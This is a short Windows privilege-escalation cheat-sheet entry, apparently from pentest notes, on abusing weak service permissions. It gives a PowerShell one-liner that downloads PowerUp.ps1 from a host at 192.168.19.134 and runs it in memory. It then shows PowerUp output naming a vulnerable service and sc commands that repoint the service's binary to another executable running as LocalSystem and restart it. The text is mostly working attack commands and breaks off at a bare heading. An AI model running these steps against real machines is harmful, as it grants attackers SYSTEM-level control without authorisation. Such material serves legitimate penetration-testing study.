Weak Service Permissions

We can run PowerUp to enumerate

PS C:\> iex(new-object net.webclient).DownloadString('http://192.168.19.134/PowerUp.ps1')

[*] Running Invoke-AllChecks

[*] Checking service permissions...


ServiceName   : VulnService
Path          : C:\Setup\Vuln Service\VulnService.exe
StartName     : NT AUTHORITY\LocalService
AbuseFunction : Invoke-ServiceAbuse -Name 'VulnService'
CanRestart    : True

We can abuse these weak permissions by changing the binary path of the service

C:\> sc config VulnService binPath= "C:\Setup\Vuln Service\Vuln.exe" obj= LocalSystem
C:\> sc stop VulnService
C:\> sc start VulnService

Adding User to Local Admin

Last updated